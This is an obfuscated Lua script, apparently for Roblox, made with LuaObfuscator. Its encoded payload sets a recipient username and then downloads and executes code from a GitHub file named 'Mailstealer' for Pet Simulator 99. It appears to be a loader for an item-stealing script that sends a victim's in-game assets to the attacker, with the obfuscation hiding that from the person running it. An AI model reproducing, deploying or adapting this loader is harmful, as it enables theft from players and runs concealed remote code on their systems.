--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v103=0;local v104;while true do if (v103==0) then v104=v5(v71,v19);v19=nil;v103=1;end if (v103==1) then return v104;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0 -0 ;local v73;while true do if (v72==(0 -0)) then v73=(v31/((3 -1)^(v32-(2 -1))))%((2 -0)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((1432 -(68 + 997)) + 201)))) ;return v73-(v73%1) ;end end else local v74=927 -(214 + 713) ;local v75;while true do if (v74==(0 + 0)) then v75=(1 + 1)^(v32-((2148 -(226 + 1044)) -(282 + 595))) ;return (((v31%(v75 + v75))>=v75) and (1638 -(1523 + 114))) or ((0 -0) + (117 -(32 + 85))) ;end end end end local function v21()local v34=0 + (0 -0) ;local v35;while true do if (v34==((351 -(87 + 263)) + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==(181 -(67 + 113))) then return (v38 * ((505 -317) + 68)) + v37 ;end if (v36==((0 -0) -0)) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -(4 + 1)) ;v36=953 -(802 + 150) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (1001 -(915 + 82)) ;return (v42 * ((47507146 -(1069 + 118)) -30728743)) + (v41 * (38178 + 27358)) + (v40 * (336 -80)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=(8 -6) -1 ;local v46=(v20(v44,1 -(0 + 0) ,4 + 16 ) * (((775 -(201 + 571)) -1)^(32 + 0 + 0))) + v43 ;local v47=v20(v44,21,31);local v48=((v20(v44,823 -(368 + (1544 -1121)) )==(3 -2)) and  -(19 -(10 + 8))) or 1 ;if (v47==(0 -(0 -0))) then if (v46==0) then return v48 * 0 ;else v47=443 -((1554 -(116 + 1022)) + (885 -(814 + 45))) ;v45=0 -0 ;end elseif (v47==(879 + 1168)) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/0))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + (86 -51))))) ;end local function v25(v49)local v50;if  not v49 then local v76=0;while true do if ((0 + 0)==v76) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v67=886 -(261 + 624) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=479 -(83 + 396) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1 + 0)~=v52) then else local v77=0 -0 ;while true do if ((1 + 0)==v77) then v52=562 -(306 + 254) ;break;end if (v77~=(0 + 0)) then else v55=nil;v56=nil;v77=2 -1 ;end end end if ((7 -4)==v52) then v59=nil;while true do if (v53==(0 -0)) then local v99=0 + 0 ;while true do if (v99==(1 -0)) then v56={};v57={v54,v55,nil,v56};v99=2;end if (v99==(0 + 0)) then v54={};v55={};v99=2 -1 ;end if ((1 + 1)==v99) then v53=1;break;end end end if (v53~=(605 -(268 + 335))) then else local v100=0;local v101;while true do if (v100~=(290 -(60 + 230))) then else v101=0;while true do if (v101~=(572 -(426 + 146))) then else for v116=1 + 0 ,v23() do local v117=731 -(476 + 255) ;local v118;local v119;local v120;while true do if (v117==1) then v120=nil;while true do if (v118==(1457 -(282 + 1174))) then while true do if (v119==(811 -(569 + 242))) then v120=v21();if (v20(v120,1,1)==(0 -0)) then local v186=0 + 0 ;local v187;local v188;local v189;local v190;local v191;while true do if (v186==(1025 -(706 + 318))) then v189=nil;v190=nil;v186=2;end if (v186~=(2 -0)) then else v191=nil;while true do if (v187~=(1253 -(721 + 530))) then else while true do if (v188==2) then local v194=0;local v195;while true do if (v194==(1271 -(945 + 326))) then v195=0 -0 ;while true do if (v195~=1) then else v188=3;break;end if (v195==0) then local v204=0 + 0 ;while true do if (v204~=0) then else if (v20(v190,1,701 -(271 + 429) )==(1 + 0)) then v191[1502 -(1408 + 92) ]=v59[v191[2]];end if (v20(v190,1088 -(461 + 625) ,338 -(144 + 192) )~=(217 -(42 + 174))) then else v191[1291 -(993 + 295) ]=v59[v191[3 + 0 ]];end v204=1;end if (v204==(1 + 0)) then v195=1;break;end end end end break;end end end if (v188~=(1 + 0)) then else local v196=0;local v197;while true do if (v196~=(1171 -(418 + 753))) then else v197=0 + 0 ;while true do if (v197~=0) then else local v205=0;while true do if (v205~=(1 + 0)) then else v197=1581 -(1183 + 397) ;break;end if (v205~=0) then else local v208=0;while true do if (v208~=(1 + 0)) then else v205=1;break;end if (v208==(0 + 0)) then v191={v22(),v22(),nil,nil};if (v189==(1975 -(1913 + 62))) then local v214=0 + 0 ;local v215;local v216;local v217;while true do if (v214~=(1322 -(1249 + 73))) then else v215=0;v216=nil;v214=1934 -(565 + 1368) ;end if ((1 + 0)==v214) then v217=nil;while true do if (v215~=(1662 -(1477 + 184))) then else while true do if (v216~=(1145 -(466 + 679))) then else v217=0;while true do if (v217==0) then v191[6 -3 ]=v22();v191[4]=v22();break;end end break;end end break;end if (v215==(856 -(564 + 292))) then v216=0 -0 ;v217=nil;v215=1;end end break;end end elseif (v189==(2 -1)) then v191[8 -5 ]=v23();elseif (v189==2) then v191[1903 -(106 + 1794) ]=v23() -((1 + 1)^(5 + 11)) ;elseif (v189~=(8 -5)) then else local v220=0 -0 ;local v221;local v222;while true do if (v220~=(114 -(4 + 110))) then else v221=1001 -(938 + 63) ;v222=nil;v220=585 -(57 + 527) ;end if (v220~=(1428 -(41 + 1386))) then else while true do if (v221==(0 + 0)) then v222=103 -(17 + 86) ;while true do if (v222==0) then v191[1616 -(1565 + 48) ]=v23() -((2 + 0)^(1154 -(782 + 356))) ;v191[4]=v22();break;end end break;end end break;end end end v208=1 + 0 ;end end end end end if (1~=v197) then else v188=4 -2 ;break;end end break;end end end if ((0 -0)==v188) then local v198=1092 -(975 + 117) ;local v199;while true do if (v198~=(0 -0)) then else v199=166 -(122 + 44) ;while true do if (v199~=(1 -0)) then else v188=1;break;end if (0~=v199) then else local v206=0 -0 ;local v207;while true do if (v206==(0 -0)) then v207=0 + 0 ;while true do if (v207~=(0 -0)) then else local v213=0;while true do if ((1018 -(697 + 321))~=v213) then else v189=v20(v120,5 -3 ,5 -2 );v190=v20(v120,8 -4 ,1 + 5 );v213=1;end if (v213~=(1 + 0)) then else v207=1;break;end end end if ((1 -0)~=v207) then else v199=66 -(30 + 35) ;break;end end break;end end end end break;end end end if (v188~=(7 -4)) then else if (v20(v190,1230 -(322 + 905) ,3 + 0 )==(1258 -(1043 + 214))) then v191[15 -11 ]=v59[v191[1216 -(323 + 889) ]];end v54[v116]=v191;break;end end break;end if (v187~=(0 -0)) then else v188=872 -(826 + 46) ;v189=nil;v187=1;end if (v187==1) then local v192=947 -(245 + 702) ;local v193;while true do if (v192~=(580 -(361 + 219))) then else v193=0 -0 ;while true do if (v193~=(0 + 0)) then else local v203=1898 -(260 + 1638) ;while true do if (0==v203) then v190=nil;v191=nil;v203=321 -(53 + 267) ;end if (v203==(1 + 0)) then v193=1;break;end end end if (v193~=(3 -2)) then else v187=2 + 0 ;break;end end break;end end end end break;end if (v186==0) then v187=0 -0 ;v188=nil;v186=414 -(15 + 398) ;end end end break;end end break;end if ((982 -(18 + 964))==v118) then v119=0 -0 ;v120=nil;v118=1;end end break;end if (v117==(1205 -(902 + 303))) then local v160=0 + 0 ;while true do if (v160==1) then v117=1 + 0 ;break;end if (v160~=(0 + 0)) then else v118=1690 -(1121 + 569) ;v119=nil;v160=851 -(20 + 830) ;end end end end end for v121=684 -(483 + 200) ,v23() do v55[v121-(1 + 0) ]=v28();end v101=127 -(116 + 10) ;end if (v101==(1464 -(1404 + 59))) then return v57;end end break;end end end if (v53~=(1 + 0)) then else local v102=738 -(542 + 196) ;while true do if (v102==(1 -0)) then for v110=1 + 0 ,v58 do local v111=765 -(468 + 297) ;local v112;local v113;local v114;local v115;while true do if (v111==(2 + 0)) then while true do if (v112~=(3 -2)) then else v115=nil;while true do if (v113==(0 + 0)) then local v178=0 -0 ;while true do if (v178~=(2 -1)) then else v113=1;break;end if ((236 -(141 + 95))==v178) then v114=v21();v115=nil;v178=1 + 0 ;end end end if (v113==(2 -1)) then if (v114==(2 -1)) then v115=v21()~=(1551 -(1126 + 425)) ;elseif (v114==(407 -(118 + 287))) then v115=v24();elseif (v114==3) then v115=v25();end v59[v110]=v115;break;end end break;end if (v112~=0) then else local v161=0;while true do if (v161==(2 -1)) then v112=1 + 0 ;break;end if (v161==(0 -0)) then v113=0;v114=nil;v161=1;end end end end break;end if (v111==0) then v112=0 + 0 ;v113=nil;v111=3 -2 ;end if (v111==(1 + 0)) then v114=nil;v115=nil;v111=2 -0 ;end end end v57[1124 -(118 + 1003) ]=v21();v102=5 -3 ;end if (v102==0) then v58=v23();v59={};v102=378 -(142 + 235) ;end if (v102~=(9 -7)) then else v53=1 + 1 ;break;end end end end break;end if ((163 -(92 + 71))~=v52) then else local v78=977 -(553 + 424) ;while true do if (v78==(0 -0)) then v53=765 -(574 + 191) ;v54=nil;v78=1;end if (v78~=1) then else v52=1 + 0 ;break;end end end if (v52==(2 + 0)) then v57=nil;v58=nil;v52=3;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v82=v64;local v83=v65;local v84=v66;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=10) then if (v95<=4) then if (v95<=1) then if (v95>0) then local v123=0;local v124;while true do if (v123==0) then v124=v94[2];v92[v124]=v92[v124](v13(v92,v124 + 1 ,v87));break;end end else v92[v94[2]]();end elseif (v95<=2) then v92[v94[2]]=v94[3];elseif (v95>3) then if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v62;else v92[v94[2]]=v62[v94[3]];end else do return;end end elseif (v95<=7) then if (v95<=5) then v86=v94[3];elseif (v95==6) then do return;end else v92[v94[2]]=v94[3];end elseif (v95<=8) then local v128=0;local v129;local v130;while true do if (v128==1) then v92[v129 + 1 ]=v130;v92[v129]=v130[v94[4]];break;end if (v128==0) then v129=v94[2];v130=v92[v94[3]];v128=1;end end elseif (v95>9) then v86=v94[3];else local v140=v94[2];v92[v140]=v92[v140](v13(v92,v140 + 1 ,v87));end elseif (v95<=15) then if (v95<=12) then if (v95==11) then if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v62;else v92[v94[2]]=v62[v94[3]];end elseif (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95<=13) then v62[v94[3]]=v92[v94[2]];elseif (v95>14) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else local v146=v94[2];local v147,v148=v85(v92[v146](v13(v92,v146 + 1 ,v94[3])));v87=(v148 + v146) -1 ;local v149=0;for v169=v146,v87 do local v170=0;while true do if (0==v170) then v149=v149 + 1 ;v92[v169]=v147[v149];break;end end end end elseif (v95<=18) then if (v95<=16) then for v135=v94[2],v94[3] do v92[v135]=nil;end elseif (v95==17) then for v171=v94[2],v94[3] do v92[v171]=nil;end else local v150=0;local v151;local v152;local v153;local v154;while true do if (v150==0) then v151=v94[2];v152,v153=v85(v92[v151](v13(v92,v151 + 1 ,v94[3])));v150=1;end if (1==v150) then v87=(v153 + v151) -1 ;v154=0;v150=2;end if (v150==2) then for v182=v151,v87 do local v183=0;while true do if (v183==0) then v154=v154 + 1 ;v92[v182]=v152[v154];break;end end end break;end end end elseif (v95<=19) then v62[v94[3]]=v92[v94[2]];elseif (v95==20) then local v155=v94[2];local v156=v92[v94[3]];v92[v155 + 1 ]=v156;v92[v155]=v156[v94[4]];else v92[v94[2]]();end v86=v86 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030F3O006D696E6563726166745F6E656B6974030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O0012073O00014O0011000100013O00260C3O0002000100010004053O00020001001207000100013O00260C00010005000100010004053O00050001001207000200033O001213000200023O00120B000200043O00120B000300053O002014000300030006001207000500074O0012000300054O000100023O00024O0002000100010004053O001400010004053O000500010004053O001400010004053O000200012O00033O00017O00",v9(),...);
